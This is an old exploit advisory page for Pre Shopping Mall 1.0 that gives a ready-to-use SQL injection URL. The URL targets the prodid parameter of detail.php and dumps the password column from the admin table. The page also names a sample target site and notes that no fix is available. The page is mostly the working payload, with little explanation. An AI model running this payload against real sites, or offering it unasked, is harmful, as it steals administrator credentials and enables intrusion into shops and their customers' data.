Pre Shopping Mall 1.0 Remote SQL Injection Vulnerability

2007-05-03 00:00:00

==============================================

Pre Shopping Mall v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Exploit:
detail.php?prodid=-1/**/union/**/select/**/0,1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*

==============================================

Example: http://preproject.com/emall/

==============================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.